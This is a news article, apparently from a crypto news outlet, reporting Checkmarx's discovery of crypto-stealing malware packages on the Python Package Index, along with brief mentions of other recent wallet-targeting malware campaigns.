Crypto-stealing malware discovered in Python Package Index — Checkmarx

Avatar

Researchers at the Checkmarx cybersecurity firm sounded the alarm on a dangerous form of malware uploaded to the Python Package Index (PyPI) — a platform for Python developers to download and share code — that steals private keys, mnemonic phrases, and other sensitive user data.

According to the firm, the malware was automatically uploaded by a suspicious user in several different software packages meant to mimic decoding applications for popular wallets like MetaMask, Atomic, TronLink, Ronin, and other industry staples.

The malware was cleverly embedded within parts of the software packages. This allowed the malicious software to go largely undetected due to what appeared to be harmless code.

Malware, Cybercrime, Cybersecurity, Hacks

An earlier example of malicious software packages was uploaded to the Python Package Index platform in March 2024. Source: Checkmarx

However, upon closer inspection, specific components of the data allowed the hackers to take control of cryptocurrency wallets and shift funds once the unsuspecting users called specific functions embedded in the software packages.

Researchers at Checkmarx first discovered the attack vector in March 2024, resulting in the platform suspending new projects and new user accounts until the malicious elements were removed — which they eventually were.

Despite the vigilance and quick action of Checkmarx and the Python Package Index to address the issue, the malware returned in early October and has reportedly been downloaded more than 3,700 times since.

Related: Symbiotic X hacked, malware is infecting SVG files: Crypto-Sec

Malware: a modern digital plague

The malware uploaded to the Python developer hub is concerning, but far from unique. In September, cybersecurity firm McAfee Labs discovered sophisticated malware that targeted Android smartphones and could steal private keys by scanning images stored on a phone’s internal memory.

The malware used a technology known as optical character recognition to extract text from images and was primarily spread through text message links, which prompted unsuspecting users to download fraudulent malware applications posing as normal software.

Security specialists at Hewlett-Packard’s Wolf Security team later revealed that cybercriminals were increasingly using artificial intelligence to create malware — a development that significantly lowers the barrier to entry for creating malicious programs.

More recently, in October, more than 28,000 users fell prey to malware disguising itself as office productivity software and gaming applications. Fortunately, the malware only managed to steal a total of $6,000.

Magazine: 2 auditors miss $27M Penpie flaw, Pythia’s ‘claim rewards’ bug: Crypto-Sec